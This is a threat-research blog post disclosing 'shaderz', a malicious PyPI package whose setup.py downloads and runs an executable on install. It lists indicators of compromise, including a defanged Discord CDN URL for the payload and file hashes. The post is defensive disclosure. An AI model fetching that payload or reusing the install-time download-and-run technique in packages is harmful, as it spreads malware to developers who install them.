FortiGuard Labs Threat Research

Supply Chain Attack via New Malicious Python Package, “shaderz” (Part 1)

By Jin Lee | December 08, 2022

Our Fortinet Advanced Research Team recently discovered a 0-day attack in a PyPI package (Python Package Index) called “shaderz”. It was discovered on December 6, 2022, through a system we use to monitor open-source ecosystems. This Python package was published on December 2, 2022, as shown in its official PyPI repository. Our suspicions were initially raised because it only has one published version, 0.0.1, and does not include a clear description of the package, the author’s email, or its source page.

Figure 1: Blank project description

Figure 2: Release history

The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation. 

Figure 3: setup.py script

One particularly interesting element is the URL, which requires deeper analysis: https://cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub.exe.

As shown in the VirusTotal entry below, the download URL includes the following binary exe (SHA 256): 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d.

While this download URL has not previously been detected by any other threat researchers, some vendors do flag the downloaded executable file as malicious.

Figure 4: This URL has not been detected by VirusTotal

Figure 5: Vendors that detect the downloaded executable

The downloaded executable seems to be a python script compiled into an executable file. We will share more details of our analysis of this file in our next post.

We will continue to monitor and help organizations defend against malicious packages found in the wild like this one to help protect our customers against attacks from unknown sources. For more detail, read part 2 of this blog.

Fortinet Protections

FortiGuard AntiVirus detects the malicious executable identified in this report as

W32/PossibleThreat

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects as malicious and blocks the download URL cited in this report.

IOCs

shaderz-0.0.1[.]tar[.]gz

fd9f944fafb58faf783fdf4f8638d281a429b84cdb119756e6d7d92b31a079de

stub.exe

33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d

Malicious URLs

cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub[.]exe

Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.